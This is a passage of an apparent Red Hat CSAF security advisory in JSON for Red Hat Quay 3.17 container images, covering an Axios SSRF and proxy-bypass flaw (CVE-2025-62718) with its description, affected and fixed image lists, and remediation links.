        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-62718",
      "cwe": {
        "id": "CWE-1289",
        "name": "Improper Validation of Unsafe Equivalence in Input"
      },
      "discovery_date": "2026-04-09T15:01:48.111177+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456913"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not correctly handle hostname normalization when evaluating NO_PROXY rules. An attacker can exploit this by crafting requests to loopback addresses (e.g., localhost. or [::1]) which bypass the NO_PROXY configuration and are routed through the configured proxy. This can lead to Server-Side Request Forgery (SSRF) vulnerabilities, enabling attackers to access sensitive internal or loopback services that should otherwise be protected.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw has limited impact due to combination of non-default conditions to exploit: the attacker must be able to control or influence URLs passed to axios in a server-side context, the application must have both `HTTP_PROXY` and `NO_PROXY` configured, and the proxy itself must be positioned to act on the misdirected traffic or have been compromised by the attacker to intercept the rerouted traffic.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456913",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456913"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-62718",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1",
          "url": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2",
          "url": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df",
          "url": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/pull/10661",
          "url": "https://github.com/axios/axios/pull/10661"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/releases/tag/v1.15.0",
          "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"
        }
      ],
      "release_date": "2026-04-09T14:31:46.067000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
